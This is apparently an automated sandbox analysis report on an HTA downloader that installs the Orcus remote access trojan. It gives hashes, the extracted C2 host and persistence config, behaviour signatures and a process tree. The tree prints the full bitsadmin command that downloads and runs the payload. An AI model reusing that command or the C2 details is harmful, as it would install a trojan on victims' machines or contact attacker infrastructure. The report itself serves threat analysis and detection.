Analysis
-
max time kernel
471s -
max time network
473s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
15-04-2024 15:30
General
-
Target
Downloader.hta
-
Size
1KB
-
MD5
3c8fcca68536d9cc5e55b526e139fd75
-
SHA1
0d28aff554f760e6b99534a30deca54640410b13
-
SHA256
254cfad84234f93e2b1fa7f1d113ccc60f21ebc5f1cff991afd10e45339a9a4c
-
SHA512
b61788c97c1c8af30264a310b3d57025e760b3661fd2132bb5603f817852b6387f5a017aa4b51dd2c31ce4fbe99e1afd20a75ccabfdf02db11a121e4aba3271c
Malware Config
Extracted
orcus
s7vety-47274.portmap.host:47274
dd6ac135bc344ba3be035bc19a9835dc
-
autostart_method
Registry
-
enable_keylogger
false
-
install_path
%temp%\Windows Updater\updateclient.exe
-
reconnect_delay
10000
-
registry_keyname
Orcus
-
taskscheduler_taskname
Orcus
-
watchdog_path
AppData\OrcusWatchdog.exe
Signatures
-
Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
-
Orcus main payload 1 IoCs
-
Orcurs Rat Executable 3 IoCs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 5 IoCs
-
Loads dropped DLL 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Drops file in System32 directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 61 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://download1500.mediafire.com/xgli4fhktvtgK9Bw8m_4-2on1c54ciG1s61GuiikIbJMqMAv-jTZQf0xIXKi3lQtEp_MY1yFe1Dsv4FTqGBSXKwJkB7M2sEVUQkIB-NNFvd8oyyf14FjcSTTIFyL3DR1FYxsNhqrxekeji0YEnOqrmyDpOFBg_qdR86ntAMXH9CAMXw/ca30miof8gzlgqu/wqewe.exe C:\ProgramData\Sex.exe2⤵
- Download via BitsAdmin
-
-
C:\ProgramData\Sex.exe"C:\ProgramData\Sex.exe"2⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe" --install3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Updater\updateclient.exe"C:\Users\Admin\AppData\Local\Temp\Windows Updater\updateclient.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\WaitEnter.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Windows Updater\updateclient.exe"C:\Users\Admin\AppData\Local\Temp\Windows Updater\updateclient.exe"1⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa83e4ab58,0x7ffa83e4ab68,0x7ffa83e4ab782⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1744 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2244 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3044 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3052 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4352 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4500 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4480 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4788 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4640 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4792 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4792 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2468 --field-trial-handle=1944,i,5596943306340028506,4655764095916578549,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\Windows Updater\updateclient.exe"C:\Users\Admin\AppData\Local\Temp\Windows Updater\updateclient.exe"1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
250KB
MD530dd0c8885dd720e99c5e9bd58574dab
SHA171468c006b024636d459e2d4df46582d56db7e1d
SHA256e3433c83256b86491924ebfb73160c4657dff65f5c3f120e3cc536382a774118
SHA5128dcf94edc7c9e5a19aca57c693641486bb6a9b7c089e0f846f680bf6ea761c688142ed808f11bb0b50e584d5a6532b4beec5d4c319c4be45b807fba30cc91ef2
-
Filesize
1KB
MD58e9699633c7782e0b100b08c37f46e88
SHA109e86e5647e34f6a3e69d86ed080ba85fab9f94e
SHA2561f9b42e1121ad33f263947528d2d266ec44f35a66ab8d1c7aa860a1ec893a701
SHA512d8bc6a0c0a23c0c6a790b796d9683ccbf5c1f7ba862a03cfae807d6e52a65fedf1a86c2c3dc10b15383931071d1cecd7bab37224cde64d8f7bf0bc97f714c3aa
-
Filesize
1KB
MD58d443d181a43ff4ea5b33e030cffb7d2
SHA130e8d46a0c3ac899e9d53d79db32f31213944ed3
SHA25609a01ee7b38db420d7c28794e5ed25b1e1cdf14616f49d495ccb03822e325683
SHA51298f379a515266aac6c746fabfcd63c78cc92f8f82ee12e5828b8f262264dcb24f244ff4ca6494d9439d8fea0248f6eca84e8eefc370b88d91474d84b42cff23c
-
Filesize
2KB
MD5f6cb12b750f1fc48e5a17f06aaee30b5
SHA1d1d2ecc440e4811fd7b4ab3b30671f55ca98851c
SHA2565e8510a023bf024b0497f6c85ae72b8a82b59120f632b5c96667c2b9b34ec2e8
SHA51213a68f094ca811aa5dd878a63a99c1d8f9ed47baf509758635a7aec1f7e0eea3cda445ed4e9df59492767bb403e7ad59d7fed6eb63ff6dba9e82ae07e6dedc1d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
356B
MD51969bdce4fc88963d29f8a18c501a13e
SHA19727f3e0250651c57237ad21e89299cb0bd15a03
SHA2564239523398072cc0b7cafd26aa762de5d33378ec0b0ea4243c206ff8b26efa54
SHA512e28ab63323c79716972b5da791df967aa578f5c5a2c5daf187634fe7d1c49738b8413d53002da193606ce4bcd2acc22816250d33b6df49cb483f5e8e1231b921
-
Filesize
6KB
MD545d543ffdf6702201419aa20a605d895
SHA13bf26f09169bc2adbf1c8883a5eaa0e77e0d5802
SHA2568650263ac0901386b88038ce80860fe0a0dd5f618ec9725b19ee3fe5de0c47c3
SHA51267294337172b600a46d714b38e30d3aa794d59b9745149f261c3391f0849ebf6d5914e7a8bb43bb5a71356eeaa2a761c4a45f34ca05822777f5d72a44a00f3ca
-
Filesize
16KB
MD501b197032f1afd2fea8dc211736c21f5
SHA1864b6447b14c4085db76519f512572c69f0aaf58
SHA2567891e4d787a10fec9024e949539a6dd3335fb125ac527b281b4f67c6b3a8037c
SHA512966dfc21425efcb89ceff58a3283326239f06a39b5c10d4672ee2aa75ae43798f5d683e882210924cd25ab9c49a0cafcb732d4b559489a53356ad07eb6cf665e
-
Filesize
1KB
MD59be3069b2cf9222dde6c28dd9180a35a
SHA114b76614ed5c94c513b10ada5bd642e888fc1231
SHA2565e4c38466764be178ea21ba3149d0580d25d035b57e081b3abb9c06a19cfd67a
SHA512043256f38c20d8765ddf2f1d5912249bfbb017c0b630d24d9e4894f4a759dec66bf0ffaf878ac69e9dfd6db7ec5e090dd69de2333d83299ef43888c394398885
-
Filesize
918KB
MD56a6ce41b317be10a1be556678ff42d36
SHA16a40ce6183f2c6a0c70c6c4126a386e2f818c09a
SHA2564e14a02cdb06c22ff632fc07c2844b4d874d5fe3ab6741ecc23ca7e12638c135
SHA5122db8e72c07afa9d98ebb58baa0b3e2c4b9629fd0cb5d816270fe0a5f30374b58694c4d907b2f0043a208e099ce0e3b174fe4fc5c4a9a40976e763bfd62d52079
-
Filesize
662KB
MD5b36cc7f7c7148a783fbed3493bc27954
SHA144b39651949a00cf2a5cbba74c3210b980ae81b4
SHA256c1ce9a872d33fb8757c59b5cd1f26c93b9eeec3e3cf57162c29a0783e6222a38
SHA512c987c689ecc2cc57350c74ee22b66cb543535bc17b790016ec6407c3d02c539a727f5c38e1451a201e8e7ccfcb4d4639780b6e68cd38b7e67b1b28034ad738a2
-
Filesize
21KB
MD5e6fcf516d8ed8d0d4427f86e08d0d435
SHA1c7691731583ab7890086635cb7f3e4c22ca5e409
SHA2568dbe814359391ed6b0b5b182039008cf1d00964da9fbc4747f46242a95c24337
SHA512c496cf8e2e222fe1e19051b291e6860f31aae39f54369c1c5e8c9758c4b56e8af904e3e536e743a0a6fdbbf8478afba4baee92e13fc1b3073376ac6bf4a7948e
-
Filesize
357B
MD5a2b76cea3a59fa9af5ea21ff68139c98
SHA135d76475e6a54c168f536e30206578babff58274
SHA256f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839
SHA512b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad
-
Filesize
624KB
-
Filesize
296KB
-
Filesize
64KB
-
Filesize
48KB
-
Filesize
944KB
-
Filesize
944KB
-
Filesize
1.3MB
-
Filesize
152KB
-
Filesize
360KB
-
Filesize
64KB
-
Filesize
272KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
312KB
-
Filesize
96KB
-
Filesize
10.8MB
-
Filesize
1.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
56KB
-
Filesize
10.8MB
-
Filesize
368KB
-
Filesize
944KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
32KB
-
Filesize
10.8MB
-
Filesize
48KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
240KB
-
Filesize
1.0MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB